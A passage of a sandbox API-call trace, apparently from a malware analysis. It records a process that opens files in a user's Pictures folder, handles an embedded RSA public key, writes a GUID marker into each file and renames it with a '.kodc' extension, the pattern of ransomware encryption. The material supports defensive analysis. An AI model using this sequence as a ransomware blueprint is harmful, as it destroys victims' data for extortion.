Size=0x76) returned 0x33362c8 [0099.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5T6c_NBU.gif") returned=".gif" [0099.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5T6c_NBU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5t6c_nbu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.269] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=2109) returned 1 [0099.269] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.274] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x817, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.274] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.275] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.276] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x83d, lpOverlapped=0x0) returned 1 [0099.276] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.276] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.276] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.276] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.277] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.277] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.277] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.277] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.278] GetLastError () returned 0x0 [0099.278] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.278] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.278] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.278] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.278] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.278] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.279] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x83d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.279] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.279] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.279] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.279] CloseHandle (hObject=0x5cc) returned 1 [0099.281] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5T6c_NBU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5t6c_nbu.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5T6c_NBU.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5t6c_nbu.gif.kodc")) returned 1 [0099.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.282] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.284] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d63100, ftCreationTime.dwHighDateTime=0x1d5bc89, ftLastAccessTime.dwLowDateTime=0x27870be0, ftLastAccessTime.dwHighDateTime=0x1d5bc13, ftLastWriteTime.dwLowDateTime=0x27870be0, ftLastWriteTime.dwHighDateTime=0x1d5bc13, nFileSizeHigh=0x0, nFileSizeLow=0x85de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6sxsnfrZ.jpg", cAlternateFileName="")) returned 1 [0099.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.284] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6sxsnfrZ.jpg") returned=".jpg" [0099.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6sxsnfrZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6sxsnfrz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.284] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=34270) returned 1 [0099.284] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.289] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.289] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.291] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.291] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85de, lpOverlapped=0x0) returned 1 [0099.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.291] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.292] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.293] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.293] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.293] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.293] GetLastError () returned 0x0 [0099.293] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.293] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.293] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.293] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.295] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x85e0) returned 0x9ba6d90 [0099.295] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dd98 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adf0 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dde0 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae38 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.296] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae38 | out: hHeap=0x630000) returned 1 [0099.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae50 [0099.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ae38 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae38 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.299] GetCurrentThreadId () returned 0x42c [0099.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5078 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.300] GetCurrentThreadId () returned 0x42c [0099.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae38 [0099.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae20 [0099.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae68 [0099.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0099.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae38 | out: hHeap=0x630000) returned 1 [0099.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae38 [0099.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 